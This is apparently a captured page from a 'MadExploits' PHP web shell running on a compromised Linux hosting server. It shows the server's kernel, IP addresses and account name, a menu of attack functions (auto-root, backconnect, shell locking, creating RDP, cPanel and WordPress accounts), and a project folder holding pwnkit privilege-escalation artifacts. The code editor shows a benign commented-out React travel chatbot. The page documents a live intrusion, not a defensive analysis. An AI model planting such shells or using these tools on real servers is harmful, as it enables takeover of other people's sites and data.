Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.14.244.90
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
gpt /
src /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
map
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_app.js
127
B
-rw-r--r--
_document.js
231
B
-rw-r--r--
chat.js
3.71
KB
-rw-r--r--
index.js
3.87
KB
-rw-r--r--
index1.js
4.34
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chat.js
// import { useState, useRef } from 'react'; // import { OpenAI } from '@openai/api'; // const openai = new OpenAI(process.env.OPENAI_API_KEY); // const Chat = () => { // const [messages, setMessages] = useState([ // { role: 'system', content: 'Hello! I am Holiday Socho AI. How can I assist you?' }, // ]); // const [userInput, setUserInput] = useState(''); // const chatOutputRef = useRef(null); // const handleInputChange = (event) => { // setUserInput(event.target.value); // }; // const handleFormSubmit = async (event) => { // event.preventDefault(); // const response = await openai.completions.create({ // engine: 'text-davinci-002', // prompt: userInput, // maxTokens: 2000, // n: 1, // stop: '\n', // }); // const chatResponse = response.choices[0].text.trim(); // setMessages((prevMessages) => [ // ...prevMessages, // { role: 'user', content: userInput }, // { role: 'system', content: chatResponse }, // ]); // setUserInput(''); // }; // const chatOutput = messages.map((message, index) => { // if (message.role === 'user') { // return ( // <tr key={index}> // <td>{message.content}</td> // <td></td> // <td></td> // </tr> // ); // } else if (message.role === 'system') { // return ( // <tr key={index}> // <td></td> // <td>{new Date().toLocaleDateString()}</td> // <td>{message.content}</td> // </tr> // ); // } // }); // return ( // <div> // <h1>Holiday Chalo AI (3.5)</h1> // <h2 style={{ textAlign: 'center' }}> // Plan a detailed hourly trip To Manali for 2 days. Make 3 column (Day, Time, Activity) and show the result in // Tabular Format // </h2> // <div id="chatContainer"> // <table id="chatOutput" ref={chatOutputRef}> // <tbody>{chatOutput}</tbody> // </table> // <form id="chatForm" onSubmit={handleFormSubmit}> // <input // type="text" // id="userInput" // name="userInput" // autoComplete="off" // placeholder="Type your message..." // value={userInput} // onChange={handleInputChange} // /> // <button type="submit">Send</button> // </form> // </div> // <style jsx>{` // body { // font-family: Arial, sans-serif; // } // h1 { // text-align: center; // } // h2 { // text-align: center; // } // #chatContainer { // max-width: 800px; // margin: 0 auto; // padding: 20px; // } // #chatOutput { // width: 100%; // border-collapse: collapse; // margin-bottom: 20px; // } // th, // td { // text-align: left; // padding: 8px // } // th { // font-weight: bold; // } // tr:nth-child(even) { // background-color: #f2f2f2; // } // #chatForm { // display: flex; // margin-top: 20px; // } // #userInput { // flex: 1; // padding: 10px; // border: none; // border-radius: 5px 0 0 5px; // } // #userInput:focus { // outline: none; // } // button[type='submit'] { // padding: 10px; // border: none; // border-radius: 0 5px 5px 0; // background-color: #007bff; // color: #fff; // cursor: pointer; // } // button[type='submit']:hover { // background-color: #0056b3; // } // `}</style> // </div> // ); // }; // export default Chat;
Close